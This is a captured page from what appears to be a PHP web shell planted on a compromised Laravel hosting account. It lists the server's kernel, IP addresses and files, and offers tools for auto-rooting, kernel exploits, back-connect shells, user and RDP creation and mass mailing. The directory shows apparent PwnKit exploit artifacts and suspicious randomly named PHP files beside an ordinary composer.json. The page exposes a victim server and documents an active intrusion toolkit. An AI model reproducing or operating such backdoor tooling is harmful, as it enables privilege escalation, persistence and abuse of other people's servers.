Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo7.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
Cms
[ DIR ]
drwxrwxr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Modules
[ DIR ]
drwxrwxr-x
__MACOSX
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxrwxr-x
bootstrap
[ DIR ]
drwxrwxr-x
cjlqids
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxrwxr-x
database
[ DIR ]
drwxrwxr-x
fwcpgnv
[ DIR ]
drwxr-xr-x
grxqdsy
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxrwxr-x
lpihryn
[ DIR ]
drwxr-xr-x
lzjm1uo
[ DIR ]
drwxr-xr-x
m1ikorj
[ DIR ]
drwxr-xr-x
psn1afk
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxrwxr-x
resources
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
sql
[ DIR ]
drwxrwxr-x
storage
[ DIR ]
drwxrwxr-x
stubs
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
tourex-prev
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
vfmjetq
[ DIR ]
drwxr-xr-x
.editorconfig
258
B
-rw-rw-r--
.env
1.32
KB
-rw-rw-r--
.env.example
1.06
KB
-rw-rw-r--
.gitattributes
269
B
-rw-rw-r--
.gitignore
326
B
-rw-rw-r--
.htaccess
479
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
README.md
4.06
KB
-rw-rw-r--
artisan
1.65
KB
-rw-rw-r--
composer.json
2.42
KB
-rw-rw-r--
composer.lock
342.46
KB
-rw-rw-r--
error_log
370
B
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
index.php
1.18
KB
-rw-r--r--
jbrpkjmr.php
167.15
KB
-rw-r--r--
license-jkdh.php
629
B
-rw-r--r--
modules_statuses.json
580
B
-rw-rw-r--
package.json
387
B
-rw-rw-r--
phpunit.xml
1.12
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
remix.mdc
1.02
KB
-rw-rw-r--
robots.txt
85
B
-rw-r--r--
server.php
563
B
-rw-rw-r--
vite-module-loader.js
1.36
KB
-rw-rw-r--
vite.config.js
646
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "laravel/laravel", "type": "project", "description": "The Laravel Framework.", "keywords": ["framework", "laravel"], "license": "MIT", "require": { "php": "^8.1", "barryvdh/laravel-dompdf": "^3.0", "google/recaptcha": "^1.3", "guzzlehttp/guzzle": "^7.2", "intervention/image": "^2.3", "laravel/framework": "^10.0", "laravel/sanctum": "^3.2", "laravel/socialite": "^5.15", "laravel/tinker": "^2.8", "laravel/ui": "^4.5", "mews/purifier": "^3.4", "mollie/laravel-mollie": "2.25", "nwidart/laravel-modules": "^10.0", "razorpay/razorpay": "*", "srmklive/paypal": "^3.0", "stripe/stripe-php": "12.4" }, "require-dev": { "fakerphp/faker": "^1.9.1", "laravel/pint": "^1.0", "laravel/sail": "^1.18", "mockery/mockery": "^1.4.4", "nunomaduro/collision": "^7.0", "phpunit/phpunit": "^10.0" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/", "Cms\\": "cms/", "Modules\\": "Modules/" }, "files": [ "app/Helpers/helper.php", "app/Helpers/ThemeHelper.php" ] }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-update-cmd": [ "@php artisan vendor:publish --tag=laravel-assets --ansi --force" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi" ] }, "extra": { "branch-alias": { "dev-master": "10.x-dev" }, "laravel": { "dont-discover": [] } }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true, "allow-plugins": { "pestphp/pest-plugin": true, "wikimedia/composer-merge-plugin": false } }, "minimum-stability": "stable", "prefer-stable": true }
Close